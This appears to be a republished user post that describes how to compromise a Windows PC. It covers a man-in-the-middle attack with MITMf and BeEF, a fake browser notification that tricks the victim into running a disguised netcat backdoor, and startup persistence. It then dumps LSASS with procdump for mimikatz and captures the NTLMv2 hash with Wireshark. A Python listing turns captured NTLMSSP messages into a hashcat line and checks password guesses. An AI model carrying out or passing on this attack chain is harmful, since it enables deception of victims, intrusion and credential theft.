Hack Windows PC
In this article, Masschelein Steven shows how to hack a Windows PC by backdooring it to capture the NTLMv2 hash and from there recover the Windows password. Masschelein wrote the following description of the technique and the tooling used:
You can execute it in 2 ways. I prefer the second part from number 4.
The basic idea is: I've made a VBS script that calls netcat and creates a backdoor on the victim PC. I've masked the netcat EXE and the VBS script by packing them into a single executable file. I'm doing a man-in-the-middle attack with MITMf and using BeEF to hook the victim's browser. If we get a hooked browser, we send the executable through a fake notification bar. If the victim then runs the executable, we have a netcat backdoor.
The second attack is based on the same principle: do a man-in-the-middle attack with MITMf and send an executable with BeEF. This time it's a little different. I've had to tweak the Python script from MITMf so that the Samba server doesn't start. I've made a share on my attacker machine that grants everyone access, then we start Wireshark to capture the NTLMv2 hash. Again, while the victim browses the internet, we send a fake notification bar. The victim runs our EXE, and we again have a netcat backdoor. Then, from the command prompt we got, we connect to our shared folder as a network share and stop the Wireshark capture. We make a new folder under %APPDATA% and copy into it the second executable that we placed in our shared folder. Once the file is copied, we make it auto-start at startup so that we have a persistent backdoor. As a final attack, we connect to our network share, run procdump to get a memory dump of LSASS, and disconnect the network drive.
Then we load the mini-dump in mimikatz, and we have the plaintext password.
We can also get the NTLMv2 hash from Wireshark, which is also explained in the document.
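What the Wireshark capture actually contains, and how it becomes something a cracker can work on, is worth seeing in code. The following Python is an added example, not the author's tooling and not taken from the PDF: it parses the two NTLMSSP messages of the SMB authentication (the server's CHALLENGE and the client's AUTHENTICATE), assembles the hashcat -m 5600 line (`user::domain:serverchallenge:ntproofstr:blob`), and then does what a cracker does for one guess by recomputing NTProofStr. The user name, domain, password, server challenge, timestamp and client nonce are constructed placeholders, not captured values, and the message builder exists only so the example runs offline.

```python
"""Added example: NTLMv2 material from an NTLMSSP CHALLENGE/AUTHENTICATE pair (constructed messages)."""
import hashlib
import hmac
import struct


def md4(data):
    """Pure-Python MD4 (RFC 1320); NT hashes need it and OpenSSL 3 builds often disable hashlib's md4."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    rounds = (  # (mixing function, additive constant, X[] index order, shift table)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rol((a + fn(b, c, d) + X[k] + const) & mask, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def ntlmv2_hash(password, user, domain):
    """NTOWFv2: HMAC-MD5 over UPPER(user)+domain, keyed with the NT hash (MD4 of the UTF-16LE password)."""
    nt_hash = md4(password.encode("utf-16le"))
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof_str(v2_hash, server_challenge, blob):
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob); this is the value a cracker recomputes."""
    return hmac.new(v2_hash, server_challenge + blob, hashlib.md5).digest()


def _buf(msg, pos):
    """Read an NTLMSSP security buffer (Len, MaxLen, Offset; little-endian) and return its bytes."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, pos)
    return msg[offset:offset + length]


def parse_challenge(msg):
    """CHALLENGE_MESSAGE (type 2): the 8-byte ServerChallenge sits at offset 24."""
    assert msg[:8] == b"NTLMSSP\x00" and struct.unpack_from("<I", msg, 8)[0] == 2, "not a CHALLENGE_MESSAGE"
    return msg[24:32]


def parse_authenticate(msg):
    """AUTHENTICATE_MESSAGE (type 3): NtChallengeResponse = NTProofStr (16 bytes) || NTLMv2 blob."""
    assert msg[:8] == b"NTLMSSP\x00" and struct.unpack_from("<I", msg, 8)[0] == 3, "not an AUTHENTICATE_MESSAGE"
    nt_response = _buf(msg, 20)
    enc = "utf-16le" if struct.unpack_from("<I", msg, 60)[0] & 0x1 else "ascii"  # NTLMSSP_NEGOTIATE_UNICODE
    return _buf(msg, 36).decode(enc), _buf(msg, 28).decode(enc), nt_response[:16], nt_response[16:]


def hashcat_5600(challenge_msg, auth_msg):
    """user::domain:serverchallenge:ntproofstr:blob, the hashcat -m 5600 layout."""
    user, domain, proof, blob = parse_authenticate(auth_msg)
    return f"{user}::{domain}:{parse_challenge(challenge_msg).hex()}:{proof.hex()}:{blob.hex()}"


def check_password(line, candidate):
    """One cracker guess: derive NTOWFv2 for the candidate and compare the recomputed NTProofStr."""
    user, _, domain, chal, proof, blob = line.split(":")
    v2 = ntlmv2_hash(candidate, user, domain)
    return hmac.compare_digest(nt_proof_str(v2, bytes.fromhex(chal), bytes.fromhex(blob)).hex(), proof)


def build_sample_exchange(password="Winter2024!", user="alice", domain="LAB"):
    """Constructed stand-in for the two NTLMSSP packets Wireshark would show; all values hypothetical."""
    server_challenge = bytes.fromhex("0123456789abcdef")
    flags = struct.pack("<I", 0x00088201)  # UNICODE | NTLM | ALWAYS_SIGN | EXTENDED_SESSIONSECURITY
    target = domain.encode("utf-16le")
    challenge = (b"NTLMSSP\x00" + struct.pack("<I", 2)
                 + struct.pack("<HHI", len(target), len(target), 56)           # TargetName buffer
                 + flags + server_challenge + b"\x00" * 8                       # flags, challenge, reserved
                 + struct.pack("<HHI", 0, 0, 56 + len(target)) + b"\x00" * 8    # empty TargetInfo, Version
                 + target)
    # NTLMv2 blob: RespType, HiRespType, reserved, timestamp, client nonce, reserved, AvPairs, reserved
    av_pairs = struct.pack("<HH", 2, len(target)) + target + struct.pack("<HH", 0, 0)
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", 0x01D9A1B2C3D4E5F6)
            + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = nt_proof_str(ntlmv2_hash(password, user, domain), server_challenge, blob)
    parts = [b"\x00" * 24, proof + blob, target, user.encode("utf-16le"),  # Lm, Nt, Domain, User,
             "WS01".encode("utf-16le"), b""]                                 # Workstation, SessionKey
    header, offset = b"NTLMSSP\x00" + struct.pack("<I", 3), 88               # payload follows the 88-byte header
    for part in parts:
        header += struct.pack("<HHI", len(part), len(part), offset)
        offset += len(part)
    authenticate = header + flags + b"\x00" * 8 + b"\x00" * 16 + b"".join(parts)  # flags, Version, MIC, payload
    return challenge, authenticate


def demo():
    challenge, authenticate = build_sample_exchange()
    line = hashcat_5600(challenge, authenticate)
    return line, check_password(line, "Winter2024!"), check_password(line, "Summer2023!")
```

On a real capture, filter Wireshark on `ntlmssp` and feed the raw bytes of the type 2 and type 3 messages to `hashcat_5600()`; tools such as MITMf's SMB server and Responder do this extraction for you, but seeing the pieces explains why the captured value is only useful for offline cracking: NTProofStr is bound to the server challenge and the client blob, so it cannot be replayed or passed-the-hash the way an NT hash from the LSASS dump can.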
> This is a user-submitted post that explains at length how to backdoor a PC and obtain the Windows password and NTLMv2 hash. If you are interested, download a copy of the PDF file for reference from the link below.